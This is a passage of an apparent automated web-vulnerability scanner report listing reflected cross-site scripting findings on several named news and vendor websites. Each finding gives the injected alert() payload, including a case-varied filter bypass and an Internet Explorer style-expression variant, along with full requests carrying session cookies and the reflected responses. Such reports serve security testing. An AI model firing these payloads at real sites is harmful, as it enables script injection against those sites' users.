Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:05:51 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:05:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
media30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:11c5a\"><script>alert(1)</script>c3fd7bce4e6/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama
...[SNIP]...

1.105. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33748"><script>alert(1)</script>a961dd91ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33748\"><script>alert(1)</script>a961dd91ba7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg?33748"><script>alert(1)</script>a961dd91ba7=1 HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:36:26 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:36:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg?33748\"><script>alert(1)</script>a961dd91ba7=1" />
...[SNIP]...

1.106. http://thefastertimes.com/wp-content/plugins/g-lock-double-opt-in-manager/js/glock2.min.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /wp-content/plugins/g-lock-double-opt-in-manager/js/glock2.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7f2"><ScRiPt>alert(1)</ScRiPt>5db40f41346 was submitted in the REST URL parameter 1. This input was echoed as 3d7f2\"><ScRiPt>alert(1)</ScRiPt>5db40f41346 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks, but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /3d7f2"><ScRiPt>alert(1)</ScRiPt>5db40f41346/plugins/g-lock-double-opt-in-manager/js/glock2.min.js HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 20:46:31 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 20:46:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/3d7f2\"><ScRiPt>alert(1)</ScRiPt>5db40f41346/plugins/g-lock-double-opt-in-manager/js/glock2.min.js" />
...[SNIP]...

1.107. http://thefastertimes.com/wp-login.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /wp-login.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbac8"><script>alert(1)</script>30cb21dd885 was submitted in the REST URL parameter 1. This input was echoed as fbac8\"><script>alert(1)</script>30cb21dd885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fbac8"><script>alert(1)</script>30cb21dd885 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 21:34:25 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:34:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/fbac8\"><script>alert(1)</script>30cb21dd885" />
...[SNIP]...

1.108. http://thefastertimes.com/xmlrpc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /xmlrpc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17312"><script>alert(1)</script>06c1b17e735 was submitted in the REST URL parameter 1. This input was echoed as 17312\"><script>alert(1)</script>06c1b17e735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xmlrpc.php17312"><script>alert(1)</script>06c1b17e735 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 21:13:48 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:13:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/xmlrpc.php17312\"><script>alert(1)</script>06c1b17e735" />
...[SNIP]...

1.109. http://whitepapers.scmagazineuk.com/email_this_page.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /email_this_page.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d03b"><script>alert(1)</script>38ca3e6e881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email_this_page.php?url=http%3A//whitepapers.scmagazineuk.com/content1/4d03b"><script>alert(1)</script>38ca3e6e8811136 HTTP/1.1
Host: whitepapers.scmagazineuk.com
Proxy-Connection: keep-alive
Referer: http://whitepapers.scmagazineuk.com/content11136
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; __qca=P0-1355715055-1296491544254; __utmz=140824240.1296491546.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140824240.2091645457.1296491523.1296491523.1296493455.2; __utmc=140824240; __utmb=140824240.1.10.1296493455; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.5.10.1296493450

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:01 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Content-Length: 4706
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title><
...[SNIP]...
<input type="hidden" name="url" value="http://whitepapers.scmagazineuk.com/content1/4d03b"><script>alert(1)</script>38ca3e6e8811136">
...[SNIP]...

1.110. http://whitepapers.scmagazineuk.com/email_this_page.php [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /email_this_page.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 773d9"><script>alert(1)</script>c4735f62d83 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email_this_page.php?url=http%3A//whitepapers.scmagazineuk.com/content11136773d9"><script>alert(1)</script>c4735f62d83 HTTP/1.1
Host: whitepapers.scmagazineuk.com
Proxy-Connection: keep-alive
Referer: http://whitepapers.scmagazineuk.com/content11136
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; __qca=P0-1355715055-1296491544254; __utmz=140824240.1296491546.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140824240.2091645457.1296491523.1296491523.1296493455.2; __utmc=140824240; __utmb=140824240.1.10.1296493455; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.5.10.1296493450

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:12:00 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Content-Length: 4705
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title><
...[SNIP]...
<input type="hidden" name="url" value="http://whitepapers.scmagazineuk.com/content11136773d9"><script>alert(1)</script>c4735f62d83">
...[SNIP]...

1.111. http://whitepapers.scmagazineuk.com/index.php [limit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /index.php

Issue detail

The value of the limit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e38"><script>alert(1)</script>ea34dcb2694 was submitted in the limit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_categoryreport&task=viewlist&sort=pdate&id=191&limit=89e38"><script>alert(1)</script>ea34dcb2694&limitstart= HTTP/1.1
Host: whitepapers.scmagazineuk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.16.10.1296493450; __qca=P0-1355715055-1296491544254;

Response

HTTP/1.0 200 OK
Date: Mon, 31 Jan 2011 18:15:15 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 18:15:20 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="author" content="www.madisonlogi
...[SNIP]...
<a href="http://whitepapers.scmagazineuk.com/index.php?option=com_categoryreport&task=viewlist&sort=title&id=191&limit=89e38"><script>alert(1)</script>ea34dcb2694&limitstart=0" rel="nofollow" class="sortLink">
...[SNIP]...

1.112. http://whitepapers.scmagazineuk.com/index.php [sort parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://whitepapers.scmagazineuk.com
Path:   /index.php

Issue detail

The value of the sort request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5982c"style%3d"x%3aexpression(alert(1))"e1cc1d8eefc was submitted in the sort parameter. This input was echoed as 5982c"style="x:expression(alert(1))"e1cc1d8eefc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /index.php?option=com_categoryreport&task=viewlist&sort=pdate5982c"style%3d"x%3aexpression(alert(1))"e1cc1d8eefc&id=191&limit=&limitstart= HTTP/1.1
Host: whitepapers.scmagazineuk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_chn_cvp%3D%255B%255B%2527direct%252520load%2527%252C%25271296491520239%2527%255D%255D%7C1454257920239%3B%20s_key_cvp%3D%255B%255B%2527n/a%2527%252C%25271296491520241%2527%255D%255D%7C1454257920241%3B; s_sess=%20s_camp_dedupe%3DDirect%2520Loadn/a%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utmz=190090989.1296493450.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); d13795d30c26c1f7270bfa31f0d2069c=505085e11891041f927d712ba3211529; PHPSESSID=v1dnuvd3enfpm1v8f1nrrifeg0; __utma=190090989.1492737905.1296493450.1296493450.1296493450.1; __utmc=190090989; __utmb=190090989.16.10.1296493450; __qca=P0-1355715055-1296491544254;

Response

HTTP/1.0 200 OK
Date: Mon, 31 Jan 2011 18:15:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 18:15:11 GMT
Cache-Control: post-check=0, pre-check=0
P3P: CP="ALL DSP NID CUR OUR STP STA"
Connection: close
Content-Type: text/html; charset=ISO-8859-1


   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="author" content="www.madisonlogi
...[SNIP]...
<a href="http://whitepapers.scmagazineuk.com/index.php?option=com_categoryreport&task=viewlist&n=1&sort=pdate5982c"style="x:expression(alert(1))"e1cc1d8eefc&id=191&amp;limit=25&amp;limitstart=25" class="pagenav">
...[SNIP]...

1.113. http://www.astaro.com/newsletter [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.astaro.com
Path:   /newsletter

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24cb6"><script>alert(1)</script>78300d896e1 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsletter?uid=90d583b---24cb6"><script>alert(1)</script>78300d896e1 HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; __utmz=1.1296493738.1.1.utmcsr=whitepapers.scmagazineuk.com|utmccn=(referral)|utmcmd=referral|utmcct=/astaro; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; __utma=1.546991621.1296493738.1296493738.1296493738.1; __utmc=1; __utmb=112476180.4.10.1296493738;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 31 Jan 2011 18:52:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 58989
Date: Mon, 31 Jan 2011 18:52:32 GMT
X-Varnish: 1753030192
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://www.astaro.com/newsletter?uid=5179dac---24cb6"><script>alert(1)</script>78300d896e1">
...[SNIP]...

1.114. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7a4b"-alert(1)-"dcd72038d6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:f7a4b"-alert(1)-"dcd72038d6b/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334772668.4074455885.742591488; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:30 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31115
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:f7a4b"-alert(1)-"dcd72038d6b";
s_265.pfxID="bkv";
s_265.disablepihost=false;
